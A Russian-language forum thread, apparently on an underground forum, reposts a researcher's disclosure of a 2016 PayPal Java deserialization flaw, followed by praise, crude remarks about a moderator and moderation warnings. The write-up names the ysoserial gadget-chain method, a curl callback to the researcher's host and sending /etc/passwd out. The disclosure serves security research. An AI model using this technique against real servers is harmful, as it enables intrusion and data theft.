Перейти к содержимому

DustBlue IPB Skin by CodeGame Networks

Уязвимость PayPal позволяет взломать за 73 секунды видио.


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 8

#1 Ombrela

Ombrela

    Super Moderator

  • Модераторы
  • Репутация
    1032
  • 385 сообщений
  • ГородКазань
  • Депозит:5000р

Отправлено 06 February 2016 - 02:52

В декабре 2015 года я обнаружил критически опасную уязвимость в одном из сайтов PayPal для бизнеса, которая позволяла мне выполнять произвольные команды на веб-серверах внутри корпоративной сети.

Изображение


Автор: Михаил Степанкин, Positive Technologies

В декабре 2015 года я обнаружил критически опасную уязвимость в одном из сайтов PayPal для бизнеса, которая позволяла мне выполнять произвольные команды на веб-серверах внутри корпоративной сети. При отправке веб-формы на сайте manager.paypal.com в одном из скрытых параметров передавались закодированные данные в виде сериализованного объекта Java. Данный параметр можно было подделать, изменив название класса и значения его свойств, что и привело к выполнению произвольного кода на серверах. Я немедленно сообщил об этой проблеме в PayPal, и она была быстро исправлена.
Детали уязвимости
При тестировании безопасности сайта manager.paypal.com в burp suite мое внимание привлек необычный параметр “oldFormData”, который выглядел как сложный Java-объект, закодированный в base64:


Изображение

В шестнадцатеричном виде он начинался с сигнатуры «aced 0005», по которой я понял, что это сериализованный Java-объект класса “java.util.HashMap” без какой-либо цифровой подписи. Это означало, что при отправке формы мы могли подменить его на объект совершенно другого класса — и на сервере будет вызван метод “readObject” (или “readResolve”) нового класса.

Для эксплуатации мне необходимо было найти в исходниках приложения (или в библиотеках, которые оно использует) класс, который имеет что-то интересное в методе readObject или readResolve, например создание файла или исполнения системной команды с параметрами, на которые мы можем влиять.

К счастью, Chris Frohoff (@frohoff) и Gabriel Lawrence (@gebl) в начале 2015 года проделали отличную работу и нашли цепочку подходящих классов в библиотеке Commons Collections. Они также выпустили утилиту ysoserial для генерации подходящих сериализованных объектов, которые в результате приводят к выполнению произвольного кода в методе readObject.

Эксплойт
Я немедленно скачал эту утилиту с их проекта на github и сгенерировал объект класса«sun.reflect.annotation.AnnotationInvocationHandler», десериализация которого приводит к выполнению команды «curl x.s.artsploit.com/paypal», если на сервере доступна библиотека Commons Collections.

Изображение

Выполнение команды curl отсылает на мой собственный внешний сервер запросы по протоколам DNS и HTTP, что хорошо для выявления так называемых слепых уязвимостей, при которых результат выполнения команды не выводится в ответе сервера.

После этого я отправил полученный закодированный объект на сервер в параметре “oldFormData” и буквально не поверил своим глазам, когда в логе доступа на моем Nginx высветилась строчка:

Изображение

Адрес 173.0.81.65 принадлежал компании PayPal и в этот момент я понял, что могу выполнять произвольные команды на серверах сайта manager.paypal.com.

Я мог бы загрузить бекдор, получить доступ к базам данных, которые использует приложение, или побродить по внутренней сети. Вместо этого я лишь прочитал файл “/etc/passwd” отослав его на свой сервер как подтверждение уязвимости:

Изображение

Я также записал видео, как воспроизвести эту уязвимость, и отправил всю информацию в PayPal.

Ответ от PayPal
После получения отчета в PayPal быстро пофиксили уязвимость и запросили у меня мой внешний IP-адрес, с которого я проводил тестирование, для проведения внутреннего расследования. Примерно через месяц PayPal назначили мне награду за найденную уязвимость, хотя баг в их системе числился как дубликат. Насколько я понял, другой исследователь, Mark Litchfield, также отправил им информацию о похожей уязвимости 11 декабря 2015 года, за два дня до моего отчета.

В любом случае PayPal выплатили мне хорошее денежное вознаграждение, за что им большое спасибо.    Видио

 

 


#2 Александра

Александра

    Журналист

  • Пользователи
  • PipPipPipPipPip
  • Репутация
    588
  • 439 сообщений
  • Городна Неве
  • Депозит:19000р

Отправлено 06 February 2016 - 04:24

Омбрела статья что надо информативно четко.
Но не слишком ли вызывающая у тебя авка для модератора?  

Пресс служба сайта


#3 mdma2

mdma2

    Интересующийся

  • Пользователи
  • PipPipPip
  • Репутация
    73
  • 74 сообщений
  • Депозит:500р

Отправлено 06 February 2016 - 05:24

Статья класс Модератор на высоте!

#4 Riestr

Riestr

    Пенсионер-маньяк

  • Пользователи
  • PipPipPipPip
  • Репутация
    58
  • 145 сообщений
  • ГородДом Престарелых

Отправлено 06 February 2016 - 05:47

"Эта модератоша меня с ума свела"
А на счет статьи не шарю я в этом. Но написано толково.

Жили у бабуси два веселых гея
Один был в натуре геем а другой таким родился


#5 The Prototipe

The Prototipe

    Пользователь

  • Пользователи
  • PipPip
  • Репутация
    18
  • 44 сообщений
  • Депозит:12000р

Отправлено 06 February 2016 - 13:40

Риестр для флуда есть отдельное место. А статья да толковая.

#6 BES77

BES77

    "Я женюсь"

  • Пользователи
  • PipPipPipPip
  • Репутация
    89
  • 167 сообщений
  • Депозит:100000р

Отправлено 06 February 2016 - 18:16

Просмотр сообщенияАлександра (06 February 2016 - 04:24) писал:

Омбрела статья что надо информативно четко.
Но не слишком ли вызывающая у тебя авка для модератора?  

Класс самый раз то что надо! Она не модератор Она секси модератор :rolleyes:


Без паранойи теневой форум не форум ))


#7 Александра

Александра

    Журналист

  • Пользователи
  • PipPipPipPipPip
  • Репутация
    588
  • 439 сообщений
  • Городна Неве
  • Депозит:19000р

Отправлено 09 February 2016 - 00:55

Бес статья для информации а не повод снять штаны!

Пресс служба сайта


#8 Александра

Александра

    Журналист

  • Пользователи
  • PipPipPipPipPip
  • Репутация
    588
  • 439 сообщений
  • Городна Неве
  • Депозит:19000р

Отправлено 09 February 2016 - 00:59

Ещё раз увижу сообщение типо- "секси модераторша" или "Я ее хочу" будет иметь  дело со мной! Хватит уже. Это уже из рамок вон поведения на сайте. Бес это тебя касаеться в первую очередь.

Пресс служба сайта


#9 king777

king777

    Проверенный

  • Пользователи
  • PipPip
  • Репутация
    35
  • 43 сообщений
  • Депозит:284000р

Отправлено 12 February 2016 - 01:26

Понравилась статья информативно.




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных